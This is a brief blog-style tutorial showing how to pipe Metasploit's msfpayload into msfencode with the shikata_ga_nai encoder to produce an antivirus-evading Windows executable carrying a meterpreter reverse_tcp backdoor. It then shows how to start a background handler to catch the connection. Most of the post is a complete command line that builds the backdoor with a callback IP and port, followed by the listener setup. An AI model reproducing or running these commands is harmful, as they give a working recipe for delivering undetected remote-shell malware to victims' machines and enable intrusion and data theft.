Bypassing Anti-Virus with msfencode.

Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.

Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.

~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe

Now this will pipe the payload to msfecode to be passed through the packer 5 times (-c specifies the amount of times to pass it through the encoder) and it will use the polymorphic xor encryption "shikata ga nai" and output the backdoor as "FuckMonsanto.exe"

You can fire up the handler in metasploit the same way as before, but I would like to add in the fact that you can run things as a "job" which will run in the background by using the "-j" option.

msf> use exploit/multi/handler 

msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 

msf exploit(Handler) > set LHOST=19.84.20.11 

msf exploit(Handler) > set LPORT=3030

msf exploit(Handler) > exploit -j

Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.